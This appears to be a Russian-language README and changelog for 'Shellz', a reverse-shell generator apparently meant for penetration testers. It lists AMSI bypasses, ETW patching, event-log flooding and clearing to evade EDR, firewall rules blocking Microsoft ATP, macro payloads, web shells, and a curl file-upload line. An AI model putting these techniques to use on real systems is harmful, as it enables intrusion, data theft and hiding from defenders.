Shellz
Скрипт для быстрой и простой генерации распространенных реверс-шеллов.
Особенно полезен, когда нужны PowerShell и Python реверс-шеллы, которые бывает сложно правильно отформатировать.
Реверс-шеллы PowerShell
- Показывает username@computer.(domain) над приглашением и рабочей директорией
- Имеет частичный и полный обход AMSI.
- TCP, UDP и SSL шеллы
- Новый кастомный TCP реверс-шелл!
- Новый кастомный SSL реверс-шелл!
- Рефлексивная загрузка theart42's потрясающего Sharpcat!
- Windows PowerShell и Core PowerShell
- Функции для загрузки и скачивания файлов. (Использует Updog от sc0tfree)
Python
- Нет PowerShell? Не проблема!
Загрузите встроенный Python. Подписанные файлы, доверенные Microsoft Intelligent Security Graph.
Поддержка ngrok
- ngrok можно запускать/останавливать из скрипта
- пейлоады будут генерироваться с адресами ngrok
Поддержка Updog
- вы можете запускать/останавливать Updog из скрипта
- Реверс-шеллы PowerShell имеют встроенную функцию загрузки/скачивания
- Для загрузки из nix с помощью curl:
curl -F path="absolute path for Updog-folder" -F file=filename http://UpdogIP/upload
Установка Shells из git
git clone https://github.com/4ndr34z/shells
cd shells
./install.sh
Установка Shells на BlackArch:
Скриншоты

Необходимые зависимости
netcat, rlwrap, jq, basenc (coreutils)
Опциональные зависимости
updog, ngrok, xclip
Видео на YouTube
Shellz 1.7.5
Версия 1.7.7
- Добавлена опция инициализации Windows Terminal в разделе PowerShell
Версия 1.7.6
- Добавлена опция в разделе Python для использования встроенного Python в VBA-макросе
Версия 1.7.5
- Добавлена опция в разделе PowerShell для поэтапной загрузки обхода режима ограниченного языка с помощью msbuild.exe
Версия 1.7.4
- Изменен пейлоад для встроенного Python. Больше не сохраняет скрипт на диск
- Немного обфусцирован Python реверс-шелл
Версия 1.7.3
- Исправлена опечатка в пейлоаде Python3 для Windows
- Добавлена опция использования встроенного Python для получения реверс-шелла на Windows-машине без установленного Python и без использования PowerShell.
Версия 1.7.1
- Добавлено PS в приглашение в SSL-шелле
- Сокращен полный обход AMSI
Версия 1.7
- Удалено сообщение "updog не запущен", когда он изначально не был активирован
- Удалены некоторые автоматические выборы в меню
Версия 1.6.9
- Исправлена ошибка в команде блокировки MDE
- Добавлены опции команды инициализации: cmd, conhost, powershell (Если пейлоад превышает 8191 символ, его нужно инициировать непосредственно из powershell)
Версия 1.6.8
- Заполнение "Microsoft-Windows-PowerShell/Operational" ещё большим количеством записей, чтобы гарантированно вытеснить начальное выполнение скрипта. (Работает только если на цели включено ведение журнала блоков скриптов)
Версия 1.6.7
- Была только URL-безопасная кодировка Base64. Добавлена обычная кодировка base64 для пейлоадов.
Версия 1.6.6
- Добавлена опция для заполнения журнала powershell. Она запускает несколько сессий powershell, передавая длинную строку, и завершает их. Это заполняет журнал, когда включено ведение журнала блоков скриптов, эффективно вытесняя более ранние записи и тем самым удаляя событие запуска самого шелла. Может предотвратить обнаружение EDR. Успешно протестировано на SentinelOne.
- Исправлены запутанные выборы в меню. Убран автоматический ввод при выборе опций в большинстве меню.
- Добавлен слушатель Metasploit Multi/handler
Версия 1.6.5
- Добавлен патч ETW для PowerShell
- Добавлен полный обход AMSI, встроенный в PowerShell.
- Добавлена проверка длины пейлоада. Максимальная длина строки, которую можно использовать в командной строке Windows (cmd.exe), составляет 8191 символ.
Версия 1.6.4
- Исправлен PowerShell SSL-шелл
Версия 1.6.3
- Добавлено расширение переменных в пейлоаде powershell, что позволяет запускать его, например, из пакетных файлов без модификации
Версия 1.6.2
Версия 1.6.1
- Слушатель запускается в новом окне. (Опционально на Linux)
Версия 1.6
- PowerShell: Добавлена опция для рефлексивной загрузки Sharpcat
Версия 1.5.9
- PowerShell: Новый кастомный SSL-шелл
- PowerShell: Добавлены опции для выбора TCP/UDP/SSL
- PowerShell/OpenSSL: По умолчанию используется правильный слушатель при использовании SSL
Версия 1.5.8
- Обновлен установщик для использования скрипта-обёртки (не забудьте удалить /usr/local/bin/shells при обновлении с версии < 1.5.8)
Версия 1.5.7
- PowerShell: Создан уникальный TCP реверс-шелл, не использующий Net.Sockets.TCPClient
- PowerShell: Удаленные сообщения об ошибках теперь правильно отображаются
Версия 1.5.6
- PHP: добавлены опции и больше пейлоадов
Версия 1.5.5
- Добавлена опция для смены шелла в других пейлоадах
Версия 1.5.4
- PowerShell: Исправлен пейлоад для NIX
- PowerShell: Обновлен пейлоад для рефлексивной загрузки C#
Версия 1.5.3
- PowerShell: Добавлены опции для пейлоада в меню.
Версия 1.5.2
- PowerShell: Изменен реверс-шелл для обхода большего количества антивирусов
- PowerShell: Добавлено правило брандмауэра, предотвращающее связь MS ATP с домом (если у запущенного пользователя есть доступ)
- PowerShell: Обновлены VBA (макросы MS Office)
Версия 1.5.1
- PowerShell: Отключение ведения журнала блоков скриптов и CheckSuspiciousContent
- PowerShell: Очистка журналов событий PowerShell (если у запущенного пользователя есть доступ)
Версия 1.5.0
- PowerShell: Добавлены пейлоады VBA для макросов MS Office
- Добавлены некоторые пейлоады на node.js
Версия 1.4.9
- Добавлен простой C# шелл.
- Добавлен пейлоад для рефлексивной загрузки C# шелла в память. (Требуется полный обход AMSI)
- Для этого добавлен полный обход AMSI от Rastamouse
- PowerShell: Вы можете автоматически загрузить и запустить полный обход AMSI. Частичный обход AMSI делает это возможным.
- C# Шелл: Автоматически загрузить и запустить полный обход AMSI перед загрузкой в память
- Статус Updog и ngrok отображается в каждом меню
Версия 1.4.8
- Иногда меньше значит больше. Убрана обфускация в TCP/UDP реверс-шеллах PowerShell, потому что она на самом деле больше триггерит антивирус, чем обходит его, и пейлоад стал очень большим :-) Всё ещё используется рандомизация.
Версия 1.4.6
- Добавлены веб-шеллы (ASPX, PHP, JSP)
Версия 1.4.5
- Добавлены 2 бинарника реверс-шеллов на C++ для Windows 32 и 64 бит.
Версия 1.4.4
- Исправлена обработка запуска/остановки Updog
Версия 1.4.3
- Добавлена поддержка Updog
- Добавлены бинарники Netcat.
- PowerShell: Создана функциональность загрузки/скачивания (загрузка требует Updog для приема файлов)
- Добавлена дополнительная информация о запуске ngrok и Updog.
Версия 1.4.2
- PowerShell: Добавлен новый "мини-обход AMSI". (Это частичный обход) Основан на методе рефлексии Мэтта Грейбера
- PowerShell: Добавлена функция "upload" в реверс-шелл PowerShell
Версия 1.4.1
- Удален AMSI. Недостаточно протестирован :-)
Версия 1.4
- Добавлен обход AMSI для пейлоадов PowerShell
Версия 1.3.9
- Исправлена ошибка при установке порта
- Изменен порт по умолчанию на 443
- PowerShell: дополнительная обфускация
Версия 1.3.8
- PowerShell: Небольшие изменения в UDP пейлоаде
Версия 1.3.7
- Используется только нативный nc на macOS, потому что версия из homebrew не работает с входящим UDP
- PowerShell: Добавлены UDP пейлоады
Версия 1.3.6
- PowerShell: Добавлено больше пейлоадов
Версия 1.3.5
- PowerShell: Добавлены рандомизация и обфускация для пейлоада
Версия 1.3.4
- PowerShell: Используется кодировка UTF8 в пейлоаде
Версия 1.3.3
Версия 1.3.2
Версия 1.3.1
- Исправлена ошибка в Python реверс-шелле
- Добавлен awk
- Добавлен Bash UDP
Версия 1.3
- Добавлены реверс-шеллы Python для Windows
Версия 1.2.9
- Добавлен статус запуска ngrok
Версия 1.2.8
- Скрытие выбора ngrok, если он не установлен
Версия 1.2.7
- Исправлены опции установки: не выполняется опция по умолчанию при нажатии Enter без выбора
Версия 1.2.6
- Добавлена поддержка ngrok.
Версия 1.2.4
- Добавлен скрипт установки
- Добавлены опции установки для проверки и установки отсутствующих зависимостей
Версия 1.2.3
- Добавлено несколько PHP-шеллов
Версия 1.2.2
- Добавлены шеллы для: Ruby, Perl, Telnet и zsh
Версия 1.2.1
- Добавлено копирование в буфер обмена с помощью pbcopy на macOS
- Добавлена информация о прослушивании netcat, так как версии для macOS не отображают её
Версия 1.2
- Добавлены циклические шеллы netcat. Повторный вызов каждые 10 секунд. Отлично на случай потери шелла
- Добавлена проверка на netcat GNU netcat 0.7.0 Homebrew при запуске на macOS
Версия 1.1
- Добавлена поддержка macOS